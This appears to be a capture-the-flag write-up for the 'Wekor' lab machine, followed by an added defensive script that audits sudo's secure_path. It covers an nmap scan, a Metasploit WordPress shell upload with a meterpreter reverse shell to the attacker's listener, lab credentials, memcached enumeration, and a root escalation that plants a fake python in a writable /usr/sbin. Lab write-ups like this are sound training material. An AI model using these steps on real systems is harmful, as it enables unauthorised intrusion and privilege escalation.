```
# Nmap 7.93 scan initiated Thu Nov 24 22:26:41 2022 as: nmap -sSVC -T4 -v -oA scans/nmap/wekor.thm -p- wekor.thm
Nmap scan report for wekor.thm (10.10.129.101)
Host is up (0.026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 95c3ceaf07fae28e2904e4cd146a21b5 (RSA)
|   256 4d99b568afbb4e66ce7270e6e3f896a4 (ECDSA)
|_  256 0de57de81a12c0ddb7665e98345559f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 9 disallowed entries
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot
|_/comingreallysoon /interesting
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 24 22:27:13 2022 -- 1 IP address (1 host up) scanned in 31.36 seconds
```
```
Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   EDITED           yes       The WordPress password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     10.10.96.236     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /wordpress/      yes       The base path to the wordpress application
  USERNAME   wp_yura          yes       The WordPress username to authenticate with
  VHOST      site.wekor.thm   no        HTTP server virtual host

Payload information:

Description:
  This module will generate a plugin, pack the payload into it and
  upload it to a server running WordPress provided valid admin
  credentials are used.
```
In my case, it didn't work, the plugin was uploaded but wasn't activated.
```
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.18.25.199:4444
[*] Authenticating with WordPress using wp_yura:soccer13...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[-] Failed to acquire the plugin upload nonce
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.
```
So instead I started a handler with the same configuration:
```
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
```
But because MSF aborted before the end, the uploaded plugin is just an empty skeleton.
```
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : osboxes
OS          : Linux osboxes 4.15.0-132-generic #136~16.04.1-Ubuntu SMP Tue Jan 12 18:18:45 UTC 2021 i686
Meterpreter : php/linux
meterpreter > cat /etc/os-release
NAME="Ubuntu"
VERSION="16.04.6 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.6 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
```
There is a user Orka but we can't read the files (.bash_history or user.txt) in its home directory.
So we'll probably have to loot info elsewhere or exploit a service.
By listing processes, we can see there are tons of Apache workers, and a DE must be installed since Xorg and a DM (lightdm) are running. But the promising services for us are the following:
Elevation of privilege (EoP) - from www-data to Orka
Then we can connect to the memcache server and enumerate info.
```
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ telnet localhost 11211
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
version
VERSION 1.4.25 Ubuntu

stats slabs
STAT 1:chunk_size 80
STAT 1:chunks_per_page 13107
STAT 1:total_pages 1
STAT 1:total_chunks 13107
STAT 1:used_chunks 5
STAT 1:free_chunks 13102
STAT 1:free_chunks_end 0
STAT 1:mem_requested 321
STAT 1:get_hits 0
STAT 1:cmd_set 105
STAT 1:delete_hits 0
STAT 1:incr_hits 0
STAT 1:decr_hits 0
STAT 1:cas_hits 0
STAT 1:cas_badval 0
STAT 1:touch_hits 0
STAT active_slabs 1
STAT total_malloced 1048560

quit
Connection closed by foreign host.
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ su Orka
Password:
Orka@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ cd
Orka@osboxes:~$ id
uid=1001(Orka) gid=1001(Orka) groups=1001(Orka)
```
Elevation of privilege (EoP) - from www-data to root
At least the way of EoP is straightforward.
```
Orka@osboxes:~$ sudo -l
[sudo] password for Orka:

Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin
```
It's an executable we can execute and read but not write.
```
Orka@osboxes:~$ ls -lh /home/Orka/Desktop/bitcoin
-rwxr-xr-x 1 root root 7.6K Jan 23 2021 /home/Orka/Desktop/bitcoin

Orka@osboxes:~$ file /home/Orka/Desktop/bitcoin
/home/Orka/Desktop/bitcoin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8280915d0ebb7225ed63f226c15cee11ce960b6b, not stripped
```
The program asks for a password and reflects the user input. It also seems vulnerable to a buffer overflow.
```
Orka@osboxes:~$ /home/Orka/Desktop/bitcoin
Enter the password : x
x
Access Denied...

Orka@osboxes:~$ /home/Orka/Desktop/bitcoin
Enter the password : %s
%s
Access Denied...
```
Orka@osboxes:~$ /home/Orka/Desktop/bitcoin Enter the password : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Access Denied... Segmentation fault (core dumped)
By running strings we get the password, which is password.
```
Orka@osboxes:~$ strings -d -n 6 /home/Orka/Desktop/bitcoin
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
sprintf
__isoc99_scanf
__stack_chk_fail
__ctype_b_loc
system
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.3
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
Enter the password :
password
Access Denied...
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins :
Sorry, This is not a valid amount!
python /home/Orka/Desktop/transfer.py %c
;*2$",
```
```
Orka@osboxes:~/Desktop$ ./bitcoin
Enter the password : password
password
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins : 5
Saving 5 BitCoin(s) For Later Use
Do you want to make a transfer? Y/N : Y
Transfering 5 BitCoin(s)
Transfer Completed Successfully...
```
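We can also see that the program calls /home/Orka/Desktop/transfer.py at some point: the strings output contains python /home/Orka/Desktop/transfer.py %c alongside the sprintf and system imports, which suggests python is invoked by bare name rather than by absolute path.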
```
Orka@osboxes:~$ ls -lh /home/Orka/Desktop/transfer.py
-rwxr--r-- 1 root root 588 Jan 23 2021 /home/Orka/Desktop/transfer.py
```
In some other context we would not need /usr/sbin: we could store our malicious python in any writable directory (/tmp, /dev/shm, /home/Orka, etc.), prepend that directory to our PATH and pass our PATH to sudo.
```
$ hackdir=$(mktemp -d)
$ echo '#!/bin/bash' > "$hackdir/python"
$ echo '/bin/bash' >> "$hackdir/python"
$ export PATH=$hackdir:$PATH
$ sudo -u root -E /home/Orka/Desktop/bitcoin
sudo: sorry, you are not allowed to preserve the environment
```
But here we can't since there is an env_reset and secure_path.
env_reset was exploitable until sudo 1.8.5 but we have a patched version.
```
Orka@osboxes:~/Desktop$ sudo --version
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16
```
So there is no way to bypass it; we have to use the intended write to /usr/sbin.
```
$ cp "$hackdir/python" /usr/sbin/
$ chmod +x /usr/sbin/python
$ sudo -u root /home/Orka/Desktop/bitcoin
Enter the password : password
Access Granted...
User Manual:
Maximum Amount Of BitCoins Possible To Transfer at a time : 9
Amounts with more than one number will be stripped off!
And Lastly, be careful, everything is logged :)
Amount Of BitCoins : 5
root@osboxes:~/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
root@osboxes:~# cat /root/root.txt
EDITED
```
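The root cause above is a sudo-allowed binary that runs python by bare name while a directory in secure_path, searched before the real interpreter, is writable by a non-root user. The following audit is an added example, not part of the original write-up: `audit_secure_path` is a hypothetical helper name, and the check treats any directory not owned by the trusted owner, or group/world-writable, as unsafe.

```shell
#!/bin/sh
# Added example (not from the write-up); audit_secure_path is a hypothetical helper.
# Usage: audit_secure_path PATH_LIST COMMAND [TRUSTED_OWNER]
# Walks PATH_LIST in lookup order and reports directories where someone other
# than TRUSTED_OWNER (default: root) can create files. Returns 1 if COMMAND
# can be shadowed or replaced, 0 otherwise.
audit_secure_path() {
    path_list=$1 cmd=$2 owner=${3:-root}
    findings=0 first_hit=
    old_ifs=$IFS; IFS=:; set -f          # split on ':' without globbing
    for dir in $path_list; do
        [ -d "$dir" ] || continue
        # Unsafe: not owned by the trusted owner, or group/world-writable.
        # -H follows a symlinked directory such as /bin -> usr/bin.
        unsafe=$(find -H "$dir" -prune \
            \( ! -user "$owner" -o -perm -020 -o -perm -002 \) -print)
        # Remember the first directory that actually provides the command.
        if [ -z "$first_hit" ] && [ -x "$dir/$cmd" ]; then first_hit=$dir; fi
        [ -n "$unsafe" ] || continue
        if [ -z "$first_hit" ] || [ "$first_hit" = "$dir" ]; then
            # Writable directory is searched before (or is) the real location.
            echo "SHADOWABLE: $dir lets a non-$owner user supply '$cmd'"
            findings=$((findings + 1))
        else
            echo "WRITABLE: $dir (searched after '$cmd' resolves in $first_hit)"
        fi
    done
    IFS=$old_ifs; set +f
    [ "$findings" -eq 0 ]
}

# secure_path as printed by `sudo -l` on the page, with the "\:" escapes removed.
audit_secure_path \
    "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" \
    python || true
```

A SHADOWABLE finding is fixed by restoring root ownership and mode 755 on the directory, and by having the privileged program call its interpreter by absolute path.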